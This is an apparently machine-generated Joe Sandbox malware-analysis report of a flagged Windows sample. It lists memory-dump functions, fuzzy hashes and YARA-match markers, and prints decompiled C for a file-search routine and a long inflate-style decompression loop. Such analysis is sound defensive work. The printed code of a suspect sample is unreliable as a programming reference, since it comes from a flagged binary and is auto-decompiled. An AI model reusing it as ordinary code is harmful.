Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: p!C$p!C
API String ID: 0-3125587631
Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
Instruction ID: ef217add9e462a39eaf01b2cd615f348b30b4b8a27c4232395f9688b09cd85c2
Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
Instruction Fuzzy Hash: 33C15831E04219DBDF18CF68C8905EEBBB2BF88314F25826AD85677380D734A942CF95

Uniqueness

Uniqueness Score: -1.00%

Function 02B66945 Relevance: 2.7, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

`, xrefs: 02B66AD0
[N, xrefs: 02B669A9

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: `$[N
API String ID: 0-4019389694
Opcode ID: 344bce10a42f3f2c2b7532a0b46eff19d7ec8b417b9bcc6d9323088731af9fad
Instruction ID: 411b83f1df53b3535a46b6bcd127cc1703302e08da154e6f120c9ff0cb8ecfe9
Opcode Fuzzy Hash: 344bce10a42f3f2c2b7532a0b46eff19d7ec8b417b9bcc6d9323088731af9fad
Instruction Fuzzy Hash: 9A517821A4568DDEEF305D34492E3F627E79F63260F49869BCC494B14AD73C898BCB11

Uniqueness

Uniqueness Score: -1.00%

Function 02B6692C Relevance: 2.6, Strings: 2, Instructions: 146COMMON

Download Yara Rule

Strings

`, xrefs: 02B66AD0
[N, xrefs: 02B669A9

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: `$[N
API String ID: 0-4019389694
Opcode ID: 455159a7a88857426cfd3e1002192948cf12765e5abf78dca0f19f2987f3f33e
Instruction ID: 625ab792f7b4c322078d22c69c516bdfd62d1e09a199402a20a26feeea06d1b8
Opcode Fuzzy Hash: 455159a7a88857426cfd3e1002192948cf12765e5abf78dca0f19f2987f3f33e
Instruction Fuzzy Hash: 8E415E35A40349DFDF349D7489793EA23A79F55360F95426FCC4A8B189D738458ACB02

Uniqueness

Uniqueness Score: -1.00%

Function 02B81C0F Relevance: 1.6, Strings: 1, Instructions: 355COMMON

Download Yara Rule

Strings

N42, xrefs: 02B81D1F

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: N42
API String ID: 0-160677327
Opcode ID: 91a2f7780ef15b7d7c4833e3806bcdb9013c547b192a1d28d32d591d425ce318
Instruction ID: 9c6fdae5e62713cab58f5fe062c9b944d26298bec59bfbd0fee85475a46a5401
Opcode Fuzzy Hash: 91a2f7780ef15b7d7c4833e3806bcdb9013c547b192a1d28d32d591d425ce318
Instruction Fuzzy Hash: 1FB1CB7A6013098FEB259E3888997F67BE3EF63250F65429ECD848F646D3258C07C742

Uniqueness

Uniqueness Score: -1.00%

Function 00402862 Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00402862(short __ebx, short* __esi) {
				void* _t21;

				if(FindFirstFileW(E00402C37(2), _t21 - 0x2d4) != 0xffffffff) {
					E004061C9( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2a8);
					_push(__esi);
					E00406282();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x0040287a
0x00402895
0x004028a0
0x004028a1
0x004029db
0x0040287c
0x0040287f
0x00402882
0x00402885
0x00402885
0x00402ac2
0x00402ace

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: be8520f7ce657d0e4c3fefe716f9cddb98d80e231b03e641be22d0c2c0e6829e
Instruction ID: dc4ef17723f846daade3f6bb5fabbbbae416fabd81b1269148e1e628f00bda2f
Opcode Fuzzy Hash: be8520f7ce657d0e4c3fefe716f9cddb98d80e231b03e641be22d0c2c0e6829e
Instruction Fuzzy Hash: 9DF08271A04104EFD710EBA4DD499ADB378EF00324F2105BBF515F61D1D7B44E449B1A

Uniqueness

Uniqueness Score: -1.00%

Function 02B8052A Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

?J,M, xrefs: 02B8069A

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: ?J,M
API String ID: 0-3311233406
Opcode ID: 887c7ebfc6956b7042aaf4b9213793b45bb04cdfbd1a49f89d328aaa50656a91
Instruction ID: d5df2249f39ecec896d357bef3b7b4f227905dfa215c7f95dcce700036696b9c
Opcode Fuzzy Hash: 887c7ebfc6956b7042aaf4b9213793b45bb04cdfbd1a49f89d328aaa50656a91
Instruction Fuzzy Hash: 0C711272501348CFDB2A5E74C96A3DB3732EF62398F66459DCC8A9B520D336458ACF02

Uniqueness

Uniqueness Score: -1.00%

Function 02B801AC Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

Q:b, xrefs: 02B803D2

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: Q:b
API String ID: 0-793305620
Opcode ID: a0f403db7b7188cedc1a17910686ce8f0cf2fde9a8d04205233bb4c77d9ac9f2
Instruction ID: 517bee59635f898bddf5d0580c72498fe1eef99aa6e4d6ce63c821ecb000e0cc
Opcode Fuzzy Hash: a0f403db7b7188cedc1a17910686ce8f0cf2fde9a8d04205233bb4c77d9ac9f2
Instruction Fuzzy Hash: 0841C5765813228FDF7A6E3C99D63C33AF2EF63690B8441A68C868B55CD3354186CB07

Uniqueness

Uniqueness Score: -1.00%

Function 02B6026C Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8e1794e96049ad3a67dc489baa8988ae6333d6aa3c684fe0bbcb78866d1bec0
Instruction ID: 3a6e7eb7c931a7e4aceccf1360cd40784e7ced6ff6245db287a7966429bdd3f8
Opcode Fuzzy Hash: a8e1794e96049ad3a67dc489baa8988ae6333d6aa3c684fe0bbcb78866d1bec0
Instruction Fuzzy Hash: 5281BBCAD2D305CBEB82306740AF3F62212BFE5651F558EF998EB521A162DF444DC9C4

Uniqueness

Uniqueness Score: -1.00%

Function 00406ADD Relevance: .3, Instructions: 334
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E00406ADD(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E0040724C( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x4084cc; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x4084cc; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E004072B4( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M0040720C))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a5a4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a5a4 + __eax * 2) & 0x0000ffff =  *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a5a4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a5a4 + __eax * 2) & 0x0000ffff =  *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E0040724C( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E0040724C( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x432e70;
												if( *0x432e70 != 0) {
													L22:
													_t412 =  *0x40a5c8; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a5cc; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x431cec; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x431ce8; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x431cf0;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x432170;
													if(_t416 < 0x432170) {
														L15:
														__eflags = _t416 - 0x431f2c;
														_t438 = 8;
														if(_t416 > 0x431f2c) {
															__eflags = _t416 - 0x4320f0;
															if(_t416 >= 0x4320f0) {
																__eflags = _t416 - 0x432150;
																if(_t416 < 0x432150) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E004072B4(0x431cf0, 0x120, 0x101, 0x4084e0, 0x408520, 0x431cec, 0x40a5c8, 0x4325f0, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x431cf0, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x431cf0 + _t440;
														E004072B4(0x431cf0, 0x1e, 0, 0x408560, 0x40859c, 0x431ce8, 0x40a5cc, 0x4325f0, _t448 - 8);
														 *0x432e70 =  *0x432e70 + 1;
														__eflags =  *0x432e70;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405D2F( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
